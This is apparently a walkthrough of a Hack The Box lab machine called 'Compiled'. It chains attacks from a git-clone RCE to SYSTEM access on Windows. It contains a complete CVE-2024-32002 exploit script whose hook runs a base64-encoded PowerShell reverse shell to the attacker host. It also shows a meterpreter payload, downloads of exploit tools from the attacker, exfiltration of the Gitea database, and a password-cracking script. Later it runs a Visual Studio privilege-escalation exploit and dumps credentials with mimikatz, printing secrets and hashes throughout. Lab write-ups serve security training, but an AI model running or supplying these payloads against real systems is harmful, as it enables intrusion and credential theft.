Compiled
Recon
Gitea (3000)
Seems like we have access to source code of webapp on port 5000?
Great, that does seem to be the case. But the exploit will need Visual Studio :/
## Usage
Once the application is up and running, follow these steps to compile your projects:
1. Open your web browser and navigate to `http://localhost:5000`.
2. Enter the URL of your GitHub repository (must be a valid URL starting with `http://` and ending with `.git`).
3. Click the **Submit** button.
4. Wait for the compilation process to complete and view the results.
...
## Notes
**Important:** Before pushing the project to production, ensure that Visual Studio is updated to the latest version. This is necessary to avoid any compatibility issues or bugs that may arise from using outdated versions of Visual Studio.Gitea creds: test02:test02@compilation.htb:test02test02
Users:
HTTP (5000)
As we saw in the code we are able to send git repository link, it will get cloned and it will get compiled, after that ???
After some trial and error I decided to review the request (should have been the first thing!)
└─$ listen 80
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.11.26:57300.
GET /letmein.git/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.37
User-Agent: git/2.45.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2The request took like 1-2minute to arrive.
Note from the future:
READ THE FUCKING GIVEN FILES
Searching for git version: Security Advisory 2024-046: Multiple Vulnerabilities in Git
The vulnerability
CVE-2024-32002, with a CVSS score of 9.1, could allow a remote attacker to execute code on the affected device. To do so, an attacker would need to craft repositories with submodules in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a.git/directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed.The vulnerability
CVE-2024-32004, with a CVSS score of 8.2, could allow an attacker, on multi-user machines, to create a local repository that appears as a partial clone that is missing an object. Then, when this repository is cloned, it causes Git to execute arbitrary code with the full permissions of the user performing the clone.The vulnerability
CVE-2024-32465, with a CVSS score of 7.4, could allow an attacker to bypass protections for cloning untrusted repositories. While this vulnerability has been covered in CVE-2024-32004, there are circumstances where the fixes for CVE-2024-32004 are not enough, e.g., when obtaining a.zipfile containing a full copy of a Git repository, it should not be trusted by default to be safe, as e.g., hooks could be configured to run within the context of that repository.
PoC: CVE-2024-32002: Exploiting Git RCE via git clone Blog: Exploiting CVE-2024-32002: RCE via git clone
Reverse Shell (Richard)
After some brainfuckery I rewrote script a bit and managed to get shell!
#!/bin/bash
cleanup() {
/bin/rm -rf captain/ hook/ hooked/ 2>/dev/null
}
setup() {
# Define the tell-tale path
tell_tale_path="$PWD/tell.tale"
# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
}
init_hook() {
# Initialize the hook repository
git init hook
cd hook
git remote add origin $hook_repo_path
mkdir -p y/hooks
# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
echo "hallo????" > /tmp/pwnd
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA3ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
EOF
# Make the hook executable: important
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push origin main -f
cd ..
}
init_captain() {
# Initialize the captain repository
git init captain
cd captain
git remote add origin $captain_repo_path
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"
# Create a symlink
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push origin main -f
cd ..
}
exploit() {
# Local testing
git clone --recursive captain hooked
}
# Define repository path
hook_repo_path="http://10.10.11.26:3000/test02/letmein1.git"
captain_repo_path="http://10.10.11.26:3000/test02/letmein2.git"
cleanup
echo "[+] cleanup complete"
setup
echo "[+] setup complete"
init_hook
echo "[+] init_hook complete"
init_captain
echo "[+] init_captain complete"
echo "[!] Done"You need to create repositories on Gitea, first for hook and second for exploit (captain). hooked repo is actual exploit, which the app does for you.
TL;DR => Create repositories -> Run script -> Send captain git link to webapp -> wait few seconds -> profit
Oddly enough we are in bash, even tho I triggered powershell reverse shell... hmmm...
PS C:\Users> echo $ENV:SHELL
C:\Program Files\Git\usr\bin\bash.exeInformation about user:
PS C:\Users\Richard> C:\Windows\System32\whoami.exe /all
User Name SID
================ =============================================
compiled\richard S-1-5-21-4093338461-994521390-3704224775-1002
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
INICIO DE SESIÓN EN LA CONSOLA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledWinpeas:
PS C:\users\public> iwr 10.10.14.37/wp.exe -outfile wp.exe
PS C:\users\public> .\wp.exe | tee-object -filepath wp.log
...
════════════════════════════════════╣ Services Information ╠════════════════════════════════════
[X] Exception: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
...
=================================================================================================
Gitea(Gitea)["C:\Program Files\gitea\gitea.exe" web --config "C:\Program Files\gitea\custom\conf\app.ini"] - Autoload
File Permissions: Richard [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files\gitea (Richard [AllAccess])
Gitea
=================================================================================================
...
╔══════════╣ Installed Applications --Via Program Files/Uninstall registry--
╚ Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
C:\Program Files (x86)\Microsoft Visual Studio\Installer
...
C:\Program Files\Gitea(Richard [AllAccess])
...
C:\Program Files\Python312
...Gitea (Internal)
Gitea configuration:
PS C:\Program Files\gitea\custom\conf> cat app.ini
RUN_USER = COMPILED\Richard
APP_NAME = Git
RUN_MODE = prod
WORK_PATH = C:\Program Files\gitea
[ui]
DEFAULT_THEME = arc-green
[database]
DB_TYPE = sqlite3
HOST = 127.0.0.1:3306
NAME = gitea
USER = gitea
PASSWD =
SCHEMA =
SSL_MODE = disable
PATH = C:\Program Files\gitea\data\gitea.db
LOG_SQL = false
[repository]
ROOT = C:/Program Files/gitea/data/gitea-repositories
[server]
SSH_DOMAIN = gitea.compiled.htb
DOMAIN = gitea.compiled.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.compiled.htb:3000/
APP_DATA_PATH = C:\Program Files\gitea/data
DISABLE_SSH = false
SSH_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = ten8FWelzw36S77bYSUGlVCmrZn4jncN1ekaH1NoXO4
OFFLINE_MODE = false
[lfs]
PATH = C:/Program Files/gitea/data/lfs
[mailer]
ENABLED = false
[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost
[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true
[cron.update_checker]
ENABLED = false
[session]
PROVIDER = file
[log]
MODE = console
LEVEL = info
ROOT_PATH = C:/Program Files/gitea/log
[repository.pull-request]
DEFAULT_MERGE_STYLE = merge
[repository.signing]
DEFAULT_TRUST_MODEL = committer
[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MTY0MDEzMDR9.oQ3gsIgAi1_JTKKbw0lCKjwfcB3v7HvH6Wzb6M7dkE0
PASSWORD_HASH_ALGO = pbkdf2
[oauth2]
JWT_SECRET = XCXy54fFBqA-KAHA0Cjn5wp1gO4l-LY2-qgCS58VJO0The Gitea has a database at C:\Program Files\gitea\data\gitea.db, I upgraded the shell to ConPtyShell so I was able to open HTTP server with python and exfiltrate file. Interesting table is user which contains user passwords:
└─$ sqlite3 ./gitea.db
SQLite version 3.45.1 2024-01-30 16:01:20
sqlite> SELECT email, passwd, salt FROM user WHERE email LIKE '%compiled.htb';
administrator@compiled.htb|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|a45c43d36dce3076158b19c2c696ef7b
richard@compiled.htb|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|d7cf2c96277dd16d95ed5c33bb524b62
emily@compiled.htb|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|227d873cca89103cd83a976bdac52486We already have richard user and from linpeas enumeration he can't do much. emily is another user on system and we should try targeting her.
Practical Cryptography for Developers: https://cryptobook.nakov.com/mac-and-key-derivation/pbkdf2
Privilege Escalation (Emily)
Crack the password:
from cryptography.hazmat.primitives.hashes import SHA256
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
ITERATIONS = 50_000 # pbkdf2$50000$50
LENGTH = 50
EMAIL = 'emily@compiled.htb'
HASH = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
SALT = bytes.fromhex('227d873cca89103cd83a976bdac52486')
def encrypt(password, salt):
return PBKDF2HMAC(
algorithm=SHA256(),
length=LENGTH,
salt=salt,
iterations=ITERATIONS,
).derive(password.encode()).hex()
with open('/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt', encoding='UTF-8', errors="ignore") as f:
for password in f:
password = password.strip()
guess = encrypt(password, SALT)
print(f'\r{password=}{" "*16}', end='')
if guess == HASH:
print('\n\rFound it!')
breakLuckily the password was easily found. (Use god level encryption methods, but users use weak ass passwords? EMOTIONAL DAMAGE! HumanOS do be trippy)
└─$ py emily.py
password='12345678'
Found it!└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o rev.exe
---
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > run
---
PS C:\users\public> iwr 10.10.14.37/RunasCs.exe -outfile rc.exe
PS C:\users\public> iwr 10.10.14.37/rev.exe -outfile rev.exe
PS C:\users\public> .\rc.exe emily 12345678 \Users\Public\rev.exe
---
meterpreter > getuid
Server username: COMPILED\Emily
meterpreter > shell
Process 2952 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4651]
C:\Windows\system32>cd %userprofile%
cd %userprofile%
C:\Users\Emily>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 352B-98C6
C:.
+---.idlerc
| recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
| user.txt
|
+---Documents
| \---Visual Studio 2019
| \---Templates
| +---ItemTemplates
| | \---Extensibilidad
| \---ProjectTemplates
| \---Extensibilidad
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
+---OneDrive
+---Pictures
| +---Camera Roll
| \---Saved Pictures
+---Saved Games
+---Searches
| winrt--{S-1-5-21-4093338461-994521390-3704224775-1001}-.searchconnector-ms
|
+---source
| \---repos
\---Videos
\---CapturesUser.txt
C:\Users\Emily>type Desktop\user.txt
1c50f492d18f7b33db437efe72f60b30Privilege Escalation (Administrator)
C:\Users\Emily>whoami /all
User Name SID
============== =============================================
compiled\emily S-1-5-21-4093338461-994521390-3704224775-1001
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
INICIO DE SESIN EN LA CONSOLA Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compaa Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticacin NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone DisabledUpload and run winpeas again. During enumeration phase script died due to NFS Export Files? Considering the name of box it's worth looking into.
Get version of VS: (src)
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>"C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe" -property catalog_productDisplayVersion
16.10.0Dotnet version:
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full
version REG_SZ 4.8.09037Check the directory pointed by winpeas
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>dir
01/20/2024 03:03 AM <DIR> es
01/20/2024 03:03 AM 953 extension.vsixmanifest
01/20/2024 03:03 AM 36,240 Microsoft.VisualStudio.Web.Exports.dll
01/20/2024 03:03 AM 294 Microsoft.VisualStudio.Web.Exports.pkgdef
3 File(s) 37,487 bytes
3 Dir(s) 7,200,944,128 bytes free
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Web\Exports>type extension.vsixmanifest
<?xml version="1.0" encoding="utf-8"?>
<Vsix Version="1.0.0" xmlns="http://schemas.microsoft.com/developer/vsx-schema/2010">
<Identifier Id="Microsoft.VisualStudio.Web.Exports">
<Name>Microsoft Visual Studio Web Exports</Name>
<Author>Microsoft Corporation</Author>
<Version>15.0</Version>
<Description>Microsoft Visual Studio Web Exports</Description>
<Locale>1033</Locale>
<SupportedProducts>
<VisualStudio Version="15.0">
<Edition>Premium</Edition>
<Edition>Express_All</Edition>
</VisualStudio>
</SupportedProducts>
<SupportedFrameworkRuntimeEdition MinVersion="4.0" MaxVersion="4.0" />
<InstalledByMsi>true</InstalledByMsi>
<SystemComponent>true</SystemComponent>
<AllowClientRole>true</AllowClientRole>
</Identifier>
<References />
<Content>
<MefComponent>Microsoft.VisualStudio.Web.Exports.dll</MefComponent>
</Content>
</Vsix>After following some conversations it turns out root privilege escalation need CVE.
Microsoft » Visual Studio : Security Vulnerabilities, CVEs
CVE-2024-38081 was first choice as it was Elevation of Privilege Vulnerability, but description of this CVE was garbage! The only valid description I found was Defused > CVE-2024-38081
Next was CVE-2024-20656 which has beautiful post explaining everything in details: mdsec > CVE-2024-20656 – Local Privilege Escalation in the VSStandardCollectorService150 Service, and there's also PoC: https://github.com/Wh04m1001/CVE-2024-20656
Richard didn't have ability to query VSStandardCollectorService150, but Emily does:
C:\Users\Public>sc.exe qc VSStandardCollectorService150
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VSStandardCollectorService150
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Visual Studio Standard Collector Service 150
DEPENDENCIES :
SERVICE_START_NAME : LocalSystemFind the VSDiagnostics.exe full path and update path in PoC
PS C:\Users\Public> ls / -file -recurse -filter VSDiagnostics.exe -ErrorAction SilentlyContinue
Directory: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Team Tools\DiagnosticsHub\Collector
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/20/2024 2:04 AM 124840 VSDiagnostics.exeMake relevant changes:
Note: Make sure to change build to Release mode! Debug kept failing...
C:\Users\Public>certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe # cmd
certutil.exe -urlcache -f http://10.10.14.37/Expl.exe exp.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\Users\Public>.\exp.exe
.\exp.exe
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \??\C:\d0461bb7-bbe8-4fe6-903f-a2ebc72673a1 created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\44ea58f2-d0a4-484e-858c-abf4dd2b009e -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.37:4444
[*] Sending stage (201798 bytes) to 10.10.11.26
[*] Meterpreter session 7 opened (10.10.14.37:4444 -> 10.10.11.26:60049) at 2024-07-31 06:09:52 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Versin 10.0.19045.4651]
(c) Microsoft Corporation. Todos los derechos reservados.
C:\ProgramData\Microsoft\VisualStudio\SetupWMI>cd \users\administrator
C:\Users\Administrator>tree /f /a
Listado de rutas de carpetas
El nmero de serie del volumen es 352B-98C6
C:.
| .gitconfig
|
+---.idlerc
| breakpoints.lst
| recent-files.lst
|
+---3D Objects
+---Contacts
+---Desktop
| root.txt
|
+---Documents
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
|
+---Music
| cleanup.ps1Root.txt
C:\Users\Administrator>type Desktop\root.txt
82d6553d01858c85ccdfff1fce9f9156etc
Hashdump
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd lsadump::sam
Domain : COMPILED
SysKey : ef9684d8a57e7877b9db904fe9bb3f87
Local SID : S-1-5-21-4093338461-994521390-3704224775
SAMKey : 565c2b9d0fa08697947f0ec82936a0b6
RID : 000001f4 (500)
User : Administrator
Hash NTLM: f75c95bc9312632edec46b607938061e
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a8bdb4de233fcc523de7c295b60aa630
* Primary:Kerberos-Newer-Keys *
Default Salt : DESKTOP-R3UQMMNAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 7a46bc71c88814b77b54e2fea7028627b2dec86fd436880ced2c3f68b128e5f3
aes128_hmac (4096) : 904b3f567dd64033cab936670abee6d2
des_cbc_md5 (4096) : 89aef29b2f52e5ab
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : DESKTOP-R3UQMMNAdministrator
Credentials
des_cbc_md5 : 89aef29b2f52e5ab
RID : 000001f5 (501)
User : Invitado
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: ac8352a8680463c78247b75a023999cc
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 3569d5e4165ccf6c8066d4c98cd47a4c
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : d3f4619d50309b281e0af3859e8bd0de75b3a839d2f4289a5ab00757f3e39baf
aes128_hmac (4096) : d5c3fbaf968f31fda4c124b9e33f079b
des_cbc_md5 (4096) : 2a769d20a1382f1f
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 2a769d20a1382f1f
RID : 000003e9 (1001)
User : Emily
Hash NTLM: 259745cb123a52aa2e693aaacca2db52
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 56146bf0ea07641a2cb64c41a068f7c7
* Primary:Kerberos-Newer-Keys *
Default Salt : COMPILEDEmily
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 2059000111e52df43201309b5cb744d0849aa8237877373e82784d510713591c
aes128_hmac (4096) : 1c225df0e8cb5fb0fd43eb31df913ff9
des_cbc_md5 (4096) : 1f15a2a78c34260b
OldCredentials
aes256_hmac (4096) : 069c47ebd45f1ce462cf62fb1a5a672bb25dd8b0cd1e06c9f9eb120cde444716
aes128_hmac (4096) : 8f92e5fd510ae35c043ea61e959b7506
des_cbc_md5 (4096) : 80cdc1fe7ac24307
OlderCredentials
aes256_hmac (4096) : 133fc63dfa50701e924171356cbb4ad1cd8674414b5a92f373915e74ca411938
aes128_hmac (4096) : 43a8e9710a1ad97dbdb07c500b186a79
des_cbc_md5 (4096) : 02d59445e9165e52
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COMPILEDEmily
Credentials
des_cbc_md5 : 1f15a2a78c34260b
OldCredentials
des_cbc_md5 : 80cdc1fe7ac24307
RID : 000003ea (1002)
User : Richard
Hash NTLM: f21635b4c33e9ed3ee47dd5b31ff0f92
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : d9810e30b14cf2a3db102859fc719ec1
* Primary:Kerberos-Newer-Keys *
Default Salt : DESKTOP-R3UQMMNRichard
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c16ad800abbf8d777814d4a44824985c8ee0e236b8128a21eb064869a2c141bd
aes128_hmac (4096) : ab8ac67135b2bf4e034b80f2bb5212b8
des_cbc_md5 (4096) : 525e3db9adb0b358
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : DESKTOP-R3UQMMNRichard
Credentials
des_cbc_md5 : 525e3db9adb0b358Root scripts
PS C:\users\Administrator> cat Music/cleanup.ps1
function Check-Msiexec {
Get-Process -Name msiexec -ErrorAction SilentlyContinue
}
while ($true) {
$process = Check-Msiexec
if ($process) {
Write-Host "msiexec.exe process detected. Waiting for 15 seconds..."
Start-Sleep -Seconds 15
$process = Check-Msiexec
if ($process) {
Write-Host "15 seconds elapsed. Killing msiexec.exe process..."
taskkill /f /im msiexec.exe
}
}
Start-Sleep -Seconds 2
}Last updated